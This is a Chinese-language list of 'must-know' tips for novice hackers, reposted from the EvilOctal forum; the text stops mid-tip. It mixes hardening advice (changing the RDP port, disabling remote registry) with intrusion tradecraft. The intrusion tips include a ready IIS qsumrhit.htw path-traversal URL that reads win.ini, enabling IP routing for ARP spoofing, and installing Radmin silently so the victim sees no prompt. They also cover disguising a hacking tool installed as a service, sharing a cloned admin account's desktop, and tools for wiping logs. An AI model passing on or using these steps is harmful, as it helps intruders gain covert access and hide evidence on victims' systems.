整理:冰血封情 來(lái)自:http://eviloctal.hackway.net
NO.1修改Terminal Server的端口
服務(wù)端
進(jìn)入注冊(cè)表編輯器,依次展開(kāi)如下鍵名:
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcp
在右窗口中修改PortNumber的數(shù)值為任意端口號(hào),推薦1025<端口號(hào)<65535
客戶(hù)端
啟動(dòng)Terminal Server Client的客戶(hù)端管理器,到出連接文件為*.cns,用記事本打開(kāi)修改Server Port與服務(wù)器一致就OK了.
最后將修改過(guò)的*.cns重新導(dǎo)入Terminal Server Client的客戶(hù)端管理器,
Hack新手一定要知道的問(wèn)題
。NO.2禁止遠(yuǎn)程訪(fǎng)問(wèn)注冊(cè)表
In order to keep your data away from the black hats, you should do more about your system, just like pay more attention to the remote registry service!!!
方法一、
右鍵單擊‘我的電腦',選‘管理',‘服務(wù)和應(yīng)用程序',‘服務(wù)'!
停止并且禁用Remote Registry Service服務(wù)!
方法二、
打開(kāi)注冊(cè)表編輯器的如下鍵:
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSecurePipeServers
把其下的WinReg的鍵職改成1就可以了。
NO.3禁止非管理員用戶(hù)使用AT命令
這個(gè)小技巧的好處應(yīng)該不言而喻:)
啟動(dòng)注冊(cè)表編輯器,展開(kāi)如下鍵:
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa
在右邊新建立一個(gè)SubmitControl鍵名,DWORD值為1。
NO.4使LINUX對(duì)PING不響應(yīng)
LINUX應(yīng)該逐漸成為各位大峽小鳥(niǎo)手中之寶了吧?怎么才能讓它不響應(yīng)ICMP來(lái)保護(hù)自己呢?
可以用:
echo 1 > /proc/sys/net/ipv4/icmp_echo_igore_all
想恢復(fù)的時(shí)候用:
echo 0 > /proc/sys/net/ipv4/icmp_echo_igore_all
NO.5讓W(xué)IN98安全模式支持網(wǎng)絡(luò)
大家都知道WIN98安全模式要是可以進(jìn)去,是可以不受網(wǎng)吧安全管理軟件的約束的!BUT安全模式不加載網(wǎng)絡(luò)驅(qū)動(dòng),下面冰血告訴你一種讓W(xué)IN98的安全模式提供網(wǎng)絡(luò)支持的方法。
1、F8進(jìn)入安全模式。
2、選擇Command Prompt Only。
3、進(jìn)入命令行狀態(tài)時(shí),輸入Win /d:n即可以進(jìn)入代命令行的安全模式。
NO.6啟動(dòng)IP路由功能
一般我們?cè)赪INDOWSNT/2K/XP使用ARP欺騙攻擊的時(shí)候都需要先打開(kāi)IP路由功能。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
IPEnableRouter=0x1
NO.7強(qiáng)大的FC對(duì)比命令
我們?cè)谑褂孟到y(tǒng)和進(jìn)行各種任務(wù)的時(shí)候經(jīng)常需要用到文件的對(duì)比,那么我們是自己一點(diǎn)點(diǎn)的對(duì)比么?當(dāng)然不是我們用強(qiáng)大的FC對(duì)比命令。
具體參數(shù)請(qǐng)用FC /?進(jìn)行查看
NO.8通過(guò)驗(yàn)證Banner手工鑒別FTP
cmd下輸入
ftp TargetIP
User (TargetIP:(none)):ftp
331 User name okey, please send complete E-mail address as password.
Password:
如果成功
230 User logged in, proceed.
如果失敗
530 Sorry, no ANONYMOUS access allowed.
特別是這一行字是Serv-U的特有標(biāo)志
331 User name okey, please send complete E-mail address as password.
假如是MS FTP呢
cmd下輸入
ftp TargetIP
220 antivirus Microsoft FTP Serveice(Version 5.0).
User (TargetIP:(none)): ftp
331 Password required for ftp.
Password:
530 User ftp cannot log in.
特別是這一行字是MS FTP的特有標(biāo)志
331 Password required for ftp.
NO.9漏洞qsumrhit.htw和iirturnh.htw的使用方法
這個(gè)比較希奇,還是說(shuō)說(shuō):
提交例如如下的連接就可以了......
連接iissamples/issamples/oop/qsumrhit.htw?ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full">http://www.xxxx.com/iissamples/issamples/oop/qsumrhit.htw?ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full
NO.10遠(yuǎn)程控制軟件Radmin安裝注意事項(xiàng)
網(wǎng)絡(luò)滲透中,
電腦資料
《Hack新手一定要知道的問(wèn)題》(http://www.ipr-jzsc.com)。使用遠(yuǎn)程安裝Radmin的進(jìn)行控制時(shí)候,必須使用如下命令:Radmin /install /silence
否則對(duì)方的計(jì)算機(jī)窗口會(huì)彈出一個(gè)提示框說(shuō)"遠(yuǎn)程管理服務(wù)已經(jīng)安裝"。
NO.12終端服務(wù)客戶(hù)端的操作問(wèn)題
注意,通過(guò)克隆而獲得管理員權(quán)限的用戶(hù)是和管理員共用一個(gè)桌面的。如果你在桌面建立東西,管理員那邊是同樣可以看見(jiàn)的。
NO.13注冊(cè)成服務(wù)的 軟件的各項(xiàng)指標(biāo)修改方法
假如你已經(jīng)吧一個(gè)叫hackertools的工具注冊(cè)成了系統(tǒng)的服務(wù),在服務(wù)列表中存在。那么你要怎么修改他的名字呢?
這里進(jìn)入注冊(cè)表
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
找到它的服務(wù)名,假設(shè)是hcktol,現(xiàn)在展開(kāi)他的下面間。
displayname就是服務(wù)顯示名
description就是服務(wù)描述
另外可以通過(guò)用16進(jìn)制編輯器修改服務(wù)進(jìn)程名。
用輔助工具instsrv.vbs把程序安裝成自己的指定服務(wù)名和服務(wù)相識(shí)名服務(wù)。具體請(qǐng)看幫助,到處有下。
NO.14有關(guān)清除日志的話(huà)題
http://www.EvilOctal.com/forum/read.php?tid=1881
http://www.EvilOctal.com/forum/read.php?tid=1821
http://www.EvilOctal.com/forum/read.php?tid=1781
http://www.EvilOctal.com/forum/read.php?tid=1610
http://www.EvilOctal.com/forum/read.php?tid=1581
http://www.EvilOctal.com/forum/read.php?tid=1490
http://www.EvilOctal.com/forum/read.php?tid=1429
http://www.EvilOctal.com/forum/read.php?tid=1337
http://www.EvilOctal.com/forum/read.php?tid=1236
http://www.EvilOctal.com/forum/read.php?tid=992
http://www.EvilOctal.com/forum/read.php?tid=942
http://www.EvilOctal.com/forum/read.php?tid=594
http://www.EvilOctal.com/forum/read.php?tid=196
http://www.eviloctal.com/forum/read.php?tid=2016
以上是在 邪惡八進(jìn)制(EvilOctal)暨安全高峰(SecurityPeak)論壇上 以關(guān)鍵字為"日志"的資料索引 分別對(duì)應(yīng)如下主題:
[轉(zhuǎn)帖]3389如何擦除日志
[轉(zhuǎn)載]關(guān)于入侵檢測(cè)系統(tǒng)之日志檢測(cè)詳解
[轉(zhuǎn)載]入侵檢測(cè)之日志檢測(cè)
[轉(zhuǎn)載]國(guó)外的培訓(xùn)課程 安全日志的秘密
[轉(zhuǎn)載]Windows日志的保護(hù)與偽造
[轉(zhuǎn)載]用perl寫(xiě)了個(gè)把IIS日志導(dǎo)入到mysql的程序
[轉(zhuǎn)載]終端服務(wù)的日志監(jiān)控
[轉(zhuǎn)載]刪除sql server日志
[轉(zhuǎn)載]WINDOWS安全事件日志中的事件編號(hào)與描述
[轉(zhuǎn)載]如何用elsave清除日志
[轉(zhuǎn)載]FreeBSD的系統(tǒng)log日志
[轉(zhuǎn)載]UNIX系統(tǒng)后門(mén)的安放和日志的擦除
[轉(zhuǎn)載]安全事件日志事件編號(hào)與描述
[轉(zhuǎn)載]詳述Windows 2000的日志及其刪除方法
共13條信息
非常感謝你支持偶們!
關(guān)于...自動(dòng)清除日志軟件類(lèi)很多
如:
小榕的elsave清除日志工具
小榕的CleanIISLog來(lái)自動(dòng)清除日志
還有CSDN公布的ClearLogs工具
以及擦PP工具0x333shadow
專(zhuān)業(yè)清除日志iisantidote-v2工具也可以
NO.15無(wú)法刪除文件的問(wèn)題
有時(shí)候我們要?jiǎng)h除一些文件 經(jīng)常提示無(wú)法刪除 EvilOctal總結(jié)了一下 主要有以下幾種可能
第一 文件名中可能有特殊符號(hào)
那么無(wú)論你是在操作系統(tǒng)中 還是使用命令行下的del命令都是無(wú)法刪除的 這時(shí)解決方法是使用命令rd "\\?\文件路徑\文件名" 就可以刪除了
第二 有可能是文件正在使用中
那么只要找到正在使用該軟件的進(jìn)程 終止后刪除 當(dāng)然一般情況下也可以到安全模式或者命令行下刪除的
第三 可能是文件的優(yōu)先級(jí)不夠高
在任務(wù)管理器里 把相關(guān)進(jìn)程的優(yōu)先級(jí)降低 然后再一頓狂殺亂砍
第四 也許是磁盤(pán)有邏輯錯(cuò)誤
使用chkdsk檢查一下再行刪除看看
NO.16有關(guān)mid音樂(lè)格式的音軌調(diào)查
今天朋友FlyingBird傳輸了一個(gè)音樂(lè)給我 mid格式的 但是實(shí)在是播放不了
原來(lái) mid音頻走的是 音樂(lè)控制面版中的 軟件合成器 的音軌
不想 我把他靜音了 所以什么也聽(tīng)不見(jiàn)
在 主音量 控制面版里將 軟件合成器 鉤取消后就可以下的 靜音 取消就可以放了...
NO.17在139入侵過(guò)程中遇見(jiàn)host not found?
在正常情況下應(yīng)該是這樣的:
引用內(nèi)容